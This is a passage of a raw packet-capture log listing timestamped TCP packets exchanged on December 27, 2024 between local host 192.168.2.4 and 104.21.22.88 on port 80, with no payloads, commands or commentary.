                                    Dec 27, 2024 06:22:12.184353113 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.184385061 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.189038038 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.189165115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.189225912 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.193876028 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.193978071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.194044113 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.198662043 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.198725939 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.198796988 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.203485966 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.203625917 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.203680992 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.208266973 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.208395958 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.208477974 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.213090897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.213207006 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.213285923 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.217935085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.218044043 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.218132019 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.222738028 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.222871065 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.222937107 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.227572918 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.227654934 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.227675915 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.232346058 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.232498884 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.232577085 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.237149000 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.237271070 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.237343073 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.241947889 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.242074013 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.242146969 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.246762991 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.246895075 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.246962070 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.251648903 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.251702070 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.251732111 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.285339117 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.285382032 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.285419941 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.286640882 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.286710024 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.286794901 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.291505098 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.291558981 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.291620016 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.296329975 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.296401978 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.296448946 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.301088095 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.301155090 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.301927090 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.305970907 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.306066036 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.306071043 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.310751915 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.310820103 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.310877085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.315551996 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.315608978 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.315675974 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.320302963 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.320382118 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.320436001 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.325206041 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.325259924 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.325331926 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.329926014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.330054998 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.330148935 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.334755898 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.334827900 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.334862947 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.339606047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.339660883 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.339683056 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.344374895 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.344434023 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.344495058 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.348953009 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.349014997 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.349086046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.351860046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.351896048 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.351912975 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.354677916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.354747057 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.354780912 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.357584000 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.357633114 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.357713938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.360390902 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.360455036 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.360526085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.363149881 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.363248110 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.363282919 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.365813971 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.365870953 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.365956068 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.368527889 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.368588924 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.368654966 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.371119022 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.371226072 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.371233940 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.373812914 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.373893976 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.373965979 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.376370907 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.376425982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.376475096 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.378937960 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.378992081 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.379064083 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.381268978 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.381335020 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.381390095 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.383606911 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.383691072 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.383728027 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.385922909 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.385987043 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.386023045 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.388262987 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.388356924 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.388416052 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.390573978 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.390629053 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.390677929 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.392884970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.392940044 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.393011093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.395225048 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.395308971 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.395390034 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.397541046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.397600889 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.397665024 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.399893999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.399991989 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.400000095 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.402219057 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.402338982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.402390957 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.404537916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.404609919 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.404650927 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.406842947 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.406898022 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.406975985 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.409207106 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.409243107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.409312963 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.411479950 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.411535025 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.411601067 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.486449003 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.486510038 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.486557961 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.487344980 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.487416983 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.487785101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.487838984 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.487914085 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.489636898 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.489756107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.489814997 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.491138935 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.491281033 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.491348028 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.493052959 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.493163109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.493331909 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.494968891 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.495079994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.495167971 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.496797085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.496923923 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.496980906 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.498651028 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.498814106 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.498873949 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.500469923 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.500587940 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.500667095 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.502233028 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.502315044 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.502372980 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.503957987 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.504010916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.504090071 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.505670071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.505791903 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.505851030 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.507354021 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.673970938 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:13.595421076 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:13.715167046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.077255011 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.078093052 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.197865963 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.432019949 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.432064056 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.432121038 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.432538033 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.432609081 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.432663918 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.433554888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.433676004 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.433731079 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.434716940 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.434770107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.434818983 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.435837030 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.435925961 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.435981035 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.436935902 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.437078953 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.437131882 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.438060045 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.438178062 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.438239098 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.439202070 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.439337969 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.439395905 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.440304995 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.440408945 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.440473080 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.441438913 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.441550016 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.441607952 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.442572117 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.442742109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.442801952 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.443694115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.443856001 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.443931103 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.444833994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.444964886 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.445019960 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.445955992 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.446089029 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.446147919 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.447069883 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.447199106 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.447261095 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.448440075 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.448496103 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.448556900 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.449352980 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.449467897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.449532032 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.450500965 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.450581074 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.450643063 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.451625109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.451731920 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.451788902 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.452730894 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.452850103 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.452905893 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.453866005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.453958035 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.454025030 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.454988956 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.455101967 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.455158949 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.456104994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.456231117 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.456284046 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.457237005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.457375050 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.457432032 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.458336115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.458456993 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.458522081 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.459480047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.459682941 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.459739923 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.460611105 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.460726976 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.460783005 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.461862087 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.462011099 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.462066889 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.462847948 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.463009119 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.463073969 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.463985920 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.464127064 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.464196920 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.465125084 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.465265036 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.465317965 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.466243982 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.466382027 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.466445923 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.467364073 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.467493057 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.467562914 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.468486071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.468626976 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.468679905 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.469605923 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.469746113 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.469796896 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.470742941 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.470868111 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.470942974 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.471863985 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.472002029 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.472057104 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.472996950 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.473102093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.473162889 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.474119902 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.474253893 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.474299908 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.475385904 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.475505114 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.475555897 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.476371050 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.476540089 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.476593971 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.477497101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.477602959 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.477657080 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.478647947 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.478758097 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.478835106 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.479759932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.479861975 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.479932070 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.480882883 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.481026888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.481077909 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.481996059 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.482145071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:14.482203960 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:14.483144045 CET8049730104.21.22.88192.168.2.4
